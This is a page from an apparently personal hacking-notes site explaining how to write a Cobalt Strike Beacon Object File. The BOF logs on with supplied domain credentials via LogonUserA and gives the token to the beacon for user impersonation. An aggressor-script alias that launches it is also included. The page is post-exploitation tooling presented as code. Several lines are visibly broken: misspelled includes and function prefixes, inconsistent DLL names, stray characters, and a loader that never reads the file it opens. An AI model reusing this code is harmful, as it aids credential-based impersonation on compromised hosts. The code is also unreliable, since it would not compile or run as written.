> For the complete documentation index, see [llms.txt](https://f1rstbyt3.gitbook.io/hacking-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://f1rstbyt3.gitbook.io/hacking-notes/command-and-control/cobaltstrike/beacon-object-files-bof.md).

# Beacon Object Files (BOF)

A Beacon Object File (BOF) is a compiled C program, written to a convention that allows it to execute within a Beacon process and use internal Beacon APIs. BOFs are a way to rapidly extend the Beacon agent with new post-exploitation features

## CobaltStrike:

Create by including **\<windows.h>** -  windows header file\
add **beacon.h** to the local folder&#x20;

For the example below we use the Windows API (WINADVAPI) to create a new user token that we can use in CobaltStrike to change user. otherwise known as **LogonUserA (**[**https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera**](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera)**)**

To get the informaiton for it, lets look in mingw to see the calls:

```
grep -rni ' LogonUserA' -i /usr/share/mingw-w64/include
```

should result in the following:

<figure><img src="/files/PHtyl3SXLO7VPsMyJ3Wp" alt=""><figcaption></figcaption></figure>

Repeat for '**GetLastError**' and '**CloseHandle**'.

When calling a module, we need to add the DLL to get the calls from, this can be done by checking the Microsoft site and seeing the requirments (<https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera>) - here we can see we need the **ADVAPI32.dll**

<figure><img src="/files/HUymWyM6MtYgWhwsoCoW" alt=""><figcaption></figcaption></figure>

Using this before the API call, we need to add the library i.e. **ADVAPI32$LogonUserA** using the new information

the 'go' variable is default for BOF in CobStrike, but others can be used.&#x20;

The '**BeaconDataParse()'** variable gets the data submitted into Cob (supplied from CNA).&#x20;

The '**BeaconDataExtract()'** variable calls the data (in order) from the **BeaconDataParse()**

The '**BeaconIsAdmin()'** variable check is the beacons elevated and privileges, then&#x20;

The '**BeaconUseToken()'** handles new tokens&#x20;

The '**BeaconPrintf()'** prints to session&#x20;

#### *Example taken from video*

### BOF File:

```c
# include <windows.h>
# inclide "beacon.h"

WINADVAPI  WINBOOL WINAPI ADVAPI32$LogonUserA (LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
WINBASEAPI DWORD   WINAPI Kernel32$GetLastError (VOID);
WINBASEAPI WINBOOL WINAPI KERNEl32$CloseHandle (HANDLE hObject);


void go( char * buff, int len) {
    HANDLE hToken; 
    datap parser; 
    char * domain;
    char * user;
    char * pass;
    
    // Extract data given to CS
    BeaconDataParse(&parser, buff, len);
    domain = BeaconDataExtract(&parser, NULL);
    user = BeaconDataExtract(&parser, NULL);
    pass = BeaconDataExtract(&parser, NULL);

    // Check we are running elevated                 
    if (!BeaconIsAdmin()) {
        BeaconPrintf(CALLBACK_ERROR, "You need to be admin to run this");
        return;
    }
    
    // run ADV API and get token for new user (Y)
    if (ADVAPI32sLogonUserA(user, domain, pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken)) {
        BeaconUseToken(hToken);
        KERNEL32$CloseHandle(hToken);
    }
    else {
        BeaconPrintf(CALLBACK_ERROR, "Failed: %d", KERNEL32$GetLastError());
    }
}
    
```

### CNA file:

```cobol
# $1 = Beacon ID 
# $2 = Domain\User
# $3 = Password


alias luser {
    local('$handle $data $args $domain $user $pass $arch')'
    
    # Get arch: 
    $arch  = barch($1);
    
    # Parse arguments 
    ($domain, $user)  = split('\\\\', $2);
    $password         = $3;
    
    # read BOF file
    $handle = openf(script_resource("luser. $+ $arch $+.o"));
    closef($handle);
    
    # pack the arguments 
    $args = bod_pack($1, "zzz", $domain, $user, $password);c
    
    # Run the BOF
    beacon_inline_execute($1, $data, "go", $args)'
}
```

{% embed url="<https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://f1rstbyt3.gitbook.io/hacking-notes/command-and-control/cobaltstrike/beacon-object-files-bof.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.